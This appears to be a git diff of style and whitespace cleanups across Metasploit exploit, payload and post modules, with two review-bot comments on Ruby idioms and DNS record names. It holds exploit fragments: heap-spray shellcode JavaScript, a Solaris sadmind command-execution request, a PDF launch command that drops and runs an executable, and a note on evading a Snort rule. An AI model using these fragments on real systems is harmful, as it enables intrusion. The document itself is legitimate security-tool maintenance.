== 200 and res.body.match(p) != nil) success = true end - end + end end if success == true diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 2a7f73cd22..97fa44c3da 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb 
@@ -126,8 +126,8 @@ class Metasploit3 < Msf::Exploit::Remote header = XDR.encode(0) * 7 + - XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \ - 4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \ + XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, + 4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, hostname, 'system', rand_text_alpha(16)) body = diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index 326498ae5b..35003f7929 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -106,8 +106,8 @@ class Metasploit3 < Msf::Exploit::Remote def sadmind_request(host, command) header = XDR.encode(0) * 7 + - XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \ - 4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \ + XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, + 4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, host, 'system', '../../../bin/sh') body = diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index 892c62fca7..cdd9c259a2 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -86,7 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote elsif datastore['HTTP::chunked'] == true b = /chunked Transfer-Encoding forbidden/.match(res.body) if b - raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.' + raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' + + 'Support for chunked encoded requests was added to PHP on 12/15/2005. ' + + 'Try disabling HTTP::chunked and trying again.' end end end 
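Review bot: In the php_vbulletin_template.rb hunk the reflowed `raise RuntimeError, '…' + '…' + '…'` names the default exception class explicitly; `raise 'Target PHP installation does not support chunked encoding. ' + …` already raises RuntimeError and is the idiomatic form, so the class argument can be dropped while the message split is kept. The php_xmlrpc_eval.rb hunk that follows reflows the identical statement and has the same redundancy. The enclosing method starts outside the hunk.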
diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index 53d16788f3..dd6b11e877 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -91,7 +91,9 @@ class Metasploit3 < Msf::Exploit::Remote elsif datastore['HTTP::chunked'] == true b = /chunked Transfer-Encoding forbidden/.match(res.body) if b - raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.' + raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' + + 'Support for chunked encoded requests was added to PHP on 12/15/2005. ' + + 'Try disabling HTTP::chunked and trying again.' end end end diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb index 5a1d05ca76..a91307ae0c 100644 --- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb +++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # build the exploit - content = %Q| + content = <<-EOS msf @@ -112,12 +112,13 @@ ID=Abysssec width=600 height=430 VIEWASTEXT> - -| +EOS # Transmit the response to the client path = request.uri diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index 83753809a1..bc0e0f8b74 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote ''+ ''; } else { - alert('Internal Error'); + alert('Internal Error'); } | # the ret slide gets executed via call [esi+45b] 
diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index bfaff87860..da7fef5c78 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -277,7 +277,7 @@ else { custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts).obfuscate() end - return %Q| + return <<-EOS
@@ -291,7 +291,7 @@ else { - | +EOS end diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index e319b5b2e8..e17fd622bd 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -95,9 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote )) end - def junk - return rand_text_alpha(4).unpack("L")[0].to_i - end + def junk + return rand_text_alpha(4).unpack("L")[0].to_i + end def on_request_uri(cli, request) diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index a3d8fe5d22..6bb3bce634 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -115,7 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote end dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll" - html = %Q| + html = <<-EOS + - - - EOF + content = <<-EOS + + + + + + +EOS #Remove the extra tabs from content content = content.gsub(/^\t\t/, '') diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index 9d59cb8c9b..dc7058e5fe 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote # twitter.com/net__ninja 'mr_me ', # initial discovery/msf module 'sinn3r', #Auto target, obfuscation, lots of testing - ], + ], 'Version' => '$Revision$', 'References' => [ 
@@ -148,30 +148,30 @@ class Metasploit3 < Msf::Exploit::Remote main_sym = 'main' #main function name if my_target.name =~ /IE6/ or my_target.name =~ /IE7/ - js = <<-EOF - var sc = unescape('#{sc}'); + js = <<-EOS +var sc = unescape('#{sc}'); - var nops = unescape('%u0c0c%u0c0c'); - var offset = 20; - var s = offset + sc.length; - while(nops.length < s) { - nops += nops; - } - var chunk1 = nops.substring(0, s); - var chunk2 = nops.substring(0, nops.length - s); - while((chunk2.length + s) < 0x50000) { - chunk2 = chunk2 + chunk2 + chunk1; - } - var blocks = new Array(); - for(var counter=0; counter<200; counter++){ - blocks[counter] = chunk2 + sc; - } +var nops = unescape('%u0c0c%u0c0c'); +var offset = 20; +var s = offset + sc.length; +while(nops.length < s) { + nops += nops; +} +var chunk1 = nops.substring(0, s); +var chunk2 = nops.substring(0, nops.length - s); +while((chunk2.length + s) < 0x50000) { + chunk2 = chunk2 + chunk2 + chunk1; +} +var blocks = new Array(); +for(var counter=0; counter<200; counter++){ + blocks[counter] = chunk2 + sc; +} - function main() - { - #{obj_name}.AddSeries(#{my_target.ret}); - } - EOF +function main() +{ + #{obj_name}.AddSeries(#{my_target.ret}); +} +EOS end #http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 46a15b3073..4ab6491b54 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -372,8 +372,9 @@ class Metasploit3 < Msf::Exploit::Remote def create_email_body_html(body, subject) body = body.gsub(/\\[nr]/, "
\n") body = body.gsub(/\\t/, "   ") - body = "\n\n\n\n" << subject << "\n\n\n" << body << "\n

\n\n" - return body + ret = "\n\n\n\n" + ret << "" << subject << "\n\n\n" << body << "\n

\n\n" + ret end def create_tnef_exploit diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 0c7dfc6f2d..13abefbcf0 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -324,7 +324,8 @@ class Metasploit3 < Msf::Exploit::Remote end def make_xml(tiff_data) - xml_data = %Q| + xml_data = <<-EOS + @@ -383,7 +384,7 @@ class Metasploit3 < Msf::Exploit::Remote -| +EOS xml_data.gsub!(/REPLACE_TIFF/, tiff_data) xml_data diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 765199bdc6..207efa9889 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -108,8 +108,8 @@ class Metasploit3 < Msf::Exploit::Remote output = String.new() output << "#{obj_num.to_i + 1} 0 obj\r<>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r" - output << "#{obj_num.to_i + 2} 0 obj\r<>>>>stream\r#{stream}\r\nendstream\rendobj\r" - + output << "#{obj_num.to_i + 2} 0 obj\r<>>>>" + output << "stream\r#{stream}\r\nendstream\rendobj\r" return output end diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index 9a08f08c92..78e1e2e984 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -152,7 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote xref << pdf.length pdf << ioDef(5) << nObfu("< 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\#{exe_name} && del /F 1.vbs" pdf << eol << eol << eol << "#{launch_msg})" pdf << ">>>>" << endobj diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index edd7ff41c5..37c7abfffb 100644 
--- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - template = <<-EOF + template = <<-EOS @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote -EOF +EOS seh_offset = 272 path = make_nops(seh_offset) diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb old mode 100755 new mode 100644 diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb index aba9f1f36d..cfc90c64fa 100644 --- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb +++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb @@ -49,8 +49,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.exploit-db.com/exploits/8180' ], [ 'URL', 'http://www.exploit-db.com/exploits/12059/' ], ], - 'Platform' => [ 'win' ], - 'Payload' => + 'Platform' => [ 'win' ], + 'Payload' => { 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, }, @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']), OptString.new('USERNAME', [ true, 'Username', '']) ], self.class) @@ -83,10 +83,10 @@ class Metasploit3 < Msf::Exploit::Remote hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions) [ 'x86/alpha_mixed'].each { |name| - enc = framework.encoders.create(name) - if name =~/alpha/ - enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' }) - end + enc = framework.encoders.create(name) + if name =~/alpha/ + enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' }) + end hunter = enc.encode(hunter, nil, nil, platform) } 
diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index 904f2ec955..c6b39275a8 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -106,5 +106,5 @@ createDataObject\('#{path_new + decoder_file + '.bat'}', unescape\(\"#{decoder}\ decoder.gsub!(/decode_stub/, "C:/Windows/Temp/" + decoder_file + '.vbs') return decoder = Rex::Text.uri_encode(decoder) - end + end end diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb index 74a4eebbbc..158f1c3dab 100644 --- a/modules/exploits/windows/fileformat/scadaphone_zip.rb +++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb @@ -43,8 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.scadatec.com/' ], [ 'URL', 'http://www.exploit-db.com/exploits/17817/' ], ], - 'Platform' => [ 'win' ], - 'Payload' => + 'Platform' => [ 'win' ], + 'Payload' => { 'Space' => 700, 'BadChars' => "\x00\x0a\x0d", @@ -59,10 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ - OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']), - ], self.class) - + [ + OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']), + ], self.class) end def exploit diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index 6af49766f3..fef83c5f34 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb 
@@ -9,11 +9,11 @@ # http://metasploit.com/framework/ ## -## +=begin # This should bypass the following snort rule referenced from web-misc.rules (10/17/2008) # alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;) # Newer versions of this rule might find this but we've taken steps to atleast bypass this rule -## +=end require 'msf/core' @@ -94,7 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(7510), - OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ]) + OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", + 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ]) ], self.class) end diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index 60dec780e5..26fb75f5d4 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote which may result aribitrary remote code execution under the context of 'SYSTEM'. }, 'License' => MSF_LICENSE, - 'Author' => + 'Author' => [ # Original discovery (Secunia Research) 'Alin Rad Pop', diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 8e94cdce9f..4f7025640d 100644 
--- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -117,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote end end + __END__ else if (strcmp($type, "Job") == 0) { diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 5bc3a7c21d..f605077d09 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -166,9 +166,8 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending malicious packet") open_pcap() - - #handler + #handler if datastore['LOOP'] while true break if session_created? and datastore['ExitOnSession'] diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb old mode 100755 new mode 100644 index c750ba303b..9f5708f315 --- a/modules/payloads/singles/linux/armle/adduser.rb +++ b/modules/payloads/singles/linux/armle/adduser.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb index 3f32ace328..004f5b0b13 100644 --- a/modules/payloads/singles/linux/x64/exec.rb +++ b/modules/payloads/singles/linux/x64/exec.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' module Metasploit3 diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb index bb43d07c12..87abc8d704 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb 
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb index fdc98a33ec..b5c4bfc05d 100644 --- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index e4b5dabd80..6c400da7f4 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -19,6 +19,7 @@ require 'msf/core/payload/windows/exec' ### module Metasploit3 + # $Revision$ include Msf::Payload::Windows::Exec end diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb index 7240378021..d306a93937 100644 --- a/modules/payloads/singles/windows/loadlibrary.rb +++ b/modules/payloads/singles/windows/loadlibrary.rb @@ -19,6 +19,7 @@ require 'msf/core/payload/windows/loadlibrary' ### module Metasploit3 + # $Revision$ include Msf::Payload::Windows::LoadLibrary end 
diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index fe7354800e..7b84375422 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -20,7 +20,7 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Reverse HTTPS Stager', - 'Version' => '$Revision: 13402 $', + 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTPS', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb index ee0e8285d5..fc4e3fb6dd 100644 --- a/modules/payloads/stagers/linux/x64/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/core/handler/bind_tcp' diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index 36fb62eda0..a2be9a7899 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/core/handler/reverse_tcp' diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb index f71eda8be5..8770ac00e4 100644 --- a/modules/payloads/stages/linux/x64/shell.rb +++ b/modules/payloads/stages/linux/x64/shell.rb 
@@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index 47daaaf731..e001b8a48b 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -19,6 +19,7 @@ require 'msf/core/payload/osx/bundleinject' ### module Metasploit3 + # $Revision$ include Msf::Payload::Osx::BundleInject end diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb index 6a3b68cfcd..c181777f9e 100644 --- a/modules/payloads/stages/windows/dllinject.rb +++ b/modules/payloads/stages/windows/dllinject.rb @@ -21,6 +21,7 @@ require 'msf/core/payload/windows/reflectivedllinject' ### module Metasploit3 + # $Revision$ include Msf::Payload::Windows::ReflectiveDllInject end diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index fea3e648a1..945f5e168d 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -19,6 +19,7 @@ require 'msf/core/payload/windows/dllinject' ### module Metasploit3 + # $Revision$ include Msf::Payload::Windows::DllInject end diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb index 9db94f2341..2b6e0b634a 100644 --- a/modules/post/multi/gather/dns_bruteforce.rb +++ b/modules/post/multi/gather/dns_bruteforce.rb 
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => 'Multi Gather DNS Forward Lookup Bruteforce', - 'Description' => %q{ + 'Description' => %q{ Brute force subdomains and hostnames via wordlist. }, 'License' => MSF_LICENSE, @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post # Run Method for when run command is issued def run - + domain = datastore['DOMAIN'] hostlst = datastore['NAMELIST'] i, a = 0, [] @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Post ns_opt = " #{n.strip}.#{domain}" cmd = "/usr/bin/host" end - + if i <= thread_num print_status("Trying #{ns_opt}") a.push(::Thread.new { @@ -126,4 +126,4 @@ class Metasploit3 < Msf::Post end end end -end \ No newline at end of file +end diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 145dbe607b..10c29689f6 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => 'Multi Gather DNS Service Record Lookup Scan', - 'Description' => %q{ + 'Description' => %q{ Enumerates know SRV Records for a given domaon using target host DNS query tool. }, 'License' => MSF_LICENSE, 
@@ -42,21 +42,21 @@ class Metasploit3 < Msf::Post # Run Method for when run command is issued def run srvrcd = [ - '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.', - '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.', - '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.', - '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.', - '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.', - '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.', - '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.', - '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.', - '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.', - '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.', - '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.', - '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.', - '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.', - '_ldap._tcp.ForestDNSZones.' - ] + '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.', + '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.', + '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.', + '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.', + '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.', + '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.', + '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.', + '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.', + '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.', + '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.', + '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.', + '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.', + '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.', + '_ldap._tcp.ForestDNSZones.' + ] domain = datastore['DOMAIN'] 
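Review bot: The re-indented `srvrcd` list still carries three entries that can never match a real SRV record: `'_aix._tcp.'` appears twice, and `'_imap.tcp.'` and `'_kerberos.tcp.dc._msdcs.'` lack the underscore on the protocol label (SRV owner names are `_service._proto`). Change them to `'_imap._tcp.'` and `'_kerberos._tcp.dc._msdcs.'` and drop the duplicate, or append `.uniq` to the literal so the same lookup is not issued twice. The `run` method that owns this list continues past the hunk.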
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Post ip_map[host.strip] = ip.strip end end - + # Get SRV parameter for each record records.each do |r| if r =~ /svr hostname/ @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Post srv_records << rcrd end else - + rcrd[:ip] = ip_map[rcrd[:target]] # Report hosts found report_host(:host => rcrd[:ip].strip, :name => rcrd[:target]) @@ -258,4 +258,4 @@ class Metasploit3 < Msf::Post end return srv_records end -end \ No newline at end of file +end diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb index 1dd5850655..0ceb73b4d5 100644 --- a/modules/post/multi/gather/ping_sweep.rb +++ b/modules/post/multi/gather/ping_sweep.rb @@ -49,9 +49,9 @@ class Metasploit3 < Msf::Post numip = ipadd.num_ips while (iplst.length < numip) ipa = ipadd.next_ip - if (not ipa) - break - end + if (not ipa) + break + end iplst << ipa end if session.type =~ /shell/ diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 4aef47414c..2b6a4177ad 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -43,8 +43,8 @@ class Metasploit3 < Msf::Post [false, 'Port for Payload to connect to.', 4433]), OptBool.new('HANDLER', [ true, 'Start an Exploit Multi Handler to receive the connection', false]), - OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',\ - 'auto', ['auto','ruby','python','perl','bash']]) + OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell', + 'auto', ['auto','ruby','python','perl','bash']]) ], self.class) end @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post lport = datastore['LPORT'] cmd = "" case datastore['type'] - when /auto/i + when /auto/i cmd = auto_create_session(lhost,lport) when /ruby/i cmd = 